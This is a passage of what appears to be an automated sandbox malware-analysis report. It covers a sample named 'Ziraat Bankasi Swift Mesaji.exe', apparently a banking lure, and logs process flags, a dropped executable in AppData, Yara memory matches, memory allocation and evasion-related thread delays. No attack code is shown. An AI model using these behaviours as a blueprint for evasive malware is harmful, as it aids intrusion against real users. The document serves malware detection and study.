            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ZnbATfUbUgZW.exe PID: 6396, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 10A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 2E20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 2C30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 6570000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 7570000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 76C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 86C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeMemory allocated: F70000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeMemory allocated: 2990000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeMemory allocated: F70000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeMemory allocated: 5EA0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeMemory allocated: 6EA0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeMemory allocated: 6FE0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeMemory allocated: 7FE0000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599779Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599666Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599443Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
